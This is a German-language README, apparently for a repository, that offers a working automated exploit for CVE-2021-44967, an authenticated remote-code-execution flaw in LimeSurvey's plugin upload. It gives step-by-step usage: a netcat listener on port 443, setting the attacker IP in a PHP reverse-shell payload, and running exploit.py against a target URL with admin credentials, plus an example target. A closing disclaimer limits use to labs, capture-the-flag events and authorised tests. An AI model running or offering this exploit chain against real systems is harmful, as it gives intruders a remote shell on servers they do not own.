
🔥 Automatisierter RCE-Exploit für Limesurvey (CVE-2021-44967). Optimierte Exploit-Kette für Privilegieneskalation. 🚀
Dieses Repository enthält einen funktionsfähigen Exploit für CVE-2021-44967, eine Schwachstelle für authentifizierte Remotecodeausführung in LimeSurvey.
Getestet und bestätigt funktionierend auf:
Die Schwachstelle ermöglicht es einem authentifizierten Benutzer mit administrativen Rechten, ein schädliches Plugin hochzuladen. Da LimeSurvey den Inhalt des Plugin-ZIP nicht streng validiert und die Ausführung von PHP-Dateien im Plugin-Verzeichnis nicht verhindert, kann ein Angreifer RCE erzielen, indem er direkt auf die hochgeladene Shell zugreift.
config.xml wurde für die Kompatibilität mit LimeSurvey-Versionen 3.0 bis 6.0 aktualisiert.Starte einen Netcat-Listener auf deinem Rechner:
nc -lvnp 443
Bearbeite php-rev.php und setze deine lokale IP und deinen Port:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Beispiel:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: Das Hauptautomatisierungsskript.php-rev.php: PHP-Reverse-Shell-Payload.config.xml: Erforderliche Konfigurationsdatei für das LimeSurvey-Plugin.Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Es ist ausschließlich für den Einsatz in kontrollierten, legalen Umgebungen (z. B. CTFs, Laborumgebungen oder autorisierten Aufträgen) vorgesehen. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwende es verantwortungsvoll und nur auf Systemen, für die du eine ausdrückliche Genehmigung zum Testen hast.